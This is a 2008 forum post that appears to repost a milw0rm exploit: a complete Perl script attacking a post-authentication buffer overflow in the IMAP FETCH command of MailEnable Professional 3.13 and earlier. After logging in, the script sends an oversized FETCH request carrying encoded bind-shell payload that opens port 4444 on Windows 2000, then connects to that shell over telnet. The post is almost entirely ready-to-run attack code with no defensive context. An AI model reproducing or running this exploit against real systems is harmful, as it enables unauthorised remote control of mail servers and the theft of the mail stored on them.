MailEnable Pro/Ent <= 3.13 (Fetch) post-auth Remote BOF Exploit

**mostwanted** · 03-25-2008

Code:

#!/usr/bin/perl

# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
#
# Bind Shell POC Exploit for Win2K SP4 pro English
#
# Found by   : Luigi Auriemma
# Advisory   : https://aluigi.***************/adv/maildisable-adv.txt
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 10.3.2008 ..enjoy!:]
# =================================================================


use IO::Socket;

print "\n[*] MailEnable Professional 3.13 imap remote exploit";
print "\n[*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n";

if (@ARGV < 3)
{
 print " [!] Use: perl imap.pl [Host] [User] [Pass]\n";
 exit;
}

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

my $port = "143";

# metasploit shellcode port 4444
# bad char: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode=
"\x2b\xc9\x66\x81\xe9\xb0\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76".
"\x0e\xe6\x02\xe4\x6f\x83\xee\xfc\xe2\xf4\x1a\x68\x0f\x22\x0e\xfb".
"\x1b\x90\x19\x62\x6f\x03\xc2\x26\x6f\x2a\xda\x89\x98\x6a\x9e\x03".
"\x0b\xe4\xa9\x1a\x6f\x30\xc6\x03\x0f\x26\x6d\x36\x6f\x6e\x08\x33".
"\x24\xf6\x4a\x86\x24\x1b\xe1\xc3\x2e\x62\xe7\xc0\x0f\x9b\xdd\x56".
"\xc0\x47\x93\xe7\x6f\x30\xc2\x03\x0f\x09\x6d\x0e\xaf\xe4\xb9\x1e".
"\xe5\x84\xe5\x2e\x6f\xe6\x8a\x26\xf8\x0e\x25\x33\x3f\x0b\x6d\x41".
"\xd4\xe4\xa6\x0e\x6f\x1f\xfa\xaf\x6f\x2f\xee\x5c\x8c\xe1\xa8\x0c".
"\x08\x3f\x19\xd4\x82\x3c\x80\x6a\xd7\x5d\x8e\x75\x97\x5d\xb9\x56".
"\x1b\xbf\x8e\xc9\x09\x93\xdd\x52\x1b\xb9\xb9\x8b\x01\x09\x67\xef".
"\xec\x6d\xb3\x68\xe6\x90\x36\x6a\x3d\x66\x13\xaf\xb3\x90\x30\x51".
"\xb7\x3c\xb5\x51\xa7\x3c\xa5\x51\x1b\xbf\x80\x6a\xf5\x33\x80\x51".
"\x6d\x8e\x73\x6a\x40\x75\x96\xc5\xb3\x90\x30\x68\xf4\x3e\xb3\xfd".
"\x34\x07\x42\xaf\xca\x86\xb1\xfd\x32\x3c\xb3\xfd\x34\x07\x03\x4b".
"\x62\x26\xb1\xfd\x32\x3f\xb2\x56\xb1\x90\x36\x91\x8c\x88\x9f\xc4".
"\x9d\x38\x19\xd4\xb1\x90\x36\x64\x8e\x0b\x80\x6a\x87\x02\x6f\xe7".
"\x8e\x3f\xbf\x2b\x28\xe6\x01\x68\xa0\xe6\x04\x33\x24\x9c\x4c\xfc".
"\xa6\x42\x18\x40\xc8\xfc\x6b\x78\xdc\xc4\x4d\xa9\x8c\x1d\x18\xb1".
"\xf2\x90\x93\x46\x1b\xb9\xbd\x55\xb6\x3e\xb7\x53\x8e\x6e\xb7\x53".
"\xb1\x3e\x19\xd2\x8c\xc2\x3f\x07\x2a\x3c\x19\xd4\x8e\x90\x19\x35".
"\x1b\xbf\x6d\x55\x18\xec\x22\x66\x1b\xb9\xb4\xfd\x34\x07\x16\x88".
"\xe0\x30\xb5\xfd\x32\x90\x36\x02\xe4\x6f";

my $buff = "A" x 997 . "\xbb\xed\x4f\x7c" . "\x90" x 20 . $shellcode;

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die " [-] cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print " [i] " . $reply;
print " [+] logging..\n";

$exploit = "a001 LOGIN " . $user ." " . $pass ."\r\n";
send $socket, $exploit, 0;
recv($socket, $reply, 1024, 0);
print " [i] " . $reply;

$exploit = "a002 SELECT INBOX" ."\r\n";
send $socket, $exploit, 0;

print " [+] sending evil payload..\n";

$exploit = "a003 FETCH 1:4 " . $buff ."\r\n";
send $socket, $exploit, 0;

print "[*] exploiting done!\n";
print "[*] connecting to port 4444 of $host\n";
sleep(6);
system("telnet $host 4444");

close $socket;
exit;

# milw0rm.com [2008-03-14]